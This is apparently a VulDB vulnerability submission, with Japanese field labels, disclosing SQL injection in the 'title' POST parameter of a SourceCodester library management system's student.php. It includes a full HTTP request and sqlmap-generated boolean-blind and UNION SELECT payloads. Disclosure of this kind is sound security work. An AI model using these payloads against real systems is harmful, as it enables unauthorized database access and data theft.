| タイトル | SOURCECODESTER LOAN MANAGEMENT SYSTEM librarian/student.php title field SQL INJECTION |
|---|
| 説明 | The Student query is submitted via a POST request, and the title field is available for SQL injection in librarian/student.php.
request:
POST http://192.168.43.165:8081/LMS/librarian/student.php HTTP/1.1
Host: 192.168.43.165:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Origin: http://192.168.43.165:8081
Connection: close
Referer: http://192.168.43.165:8081/LMS/librarian/student.php
Cookie: PHPSESSID=ul64f71aamd0a78qqear0arh1l
Upgrade-Insecure-Requests: 1
title=1*&submit=
SQLMAP:
Parameter: title (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: title=-4699') OR 1559=1559#&submit=
Type: UNION query
Title: MySQL UNION query (random number) - 8 columns
Payload: title=-5291') UNION ALL SELECT 8516,CONCAT(0x716a786271,0x4e446b70654e6b78706b4c57704c77654d4759724d464f50514b7576656d42746a69447065657858,0x7162706a71),8516,8516,8516,8516,8516,8516#&submit= |
|---|
| ソース | ⚠️ www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html |
|---|
| ユーザー | weicheng (UID 30823) |
|---|
| 送信 | 2022年08月10日 13:46 (4 年 ago) |
|---|
| モデレーション | 2022年08月11日 11:20 (22 hours later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 206170 [SourceCodester Library Management System librarian/student.php タイトル SQLインジェクション] |
|---|
| ポイント | 17 |
|---|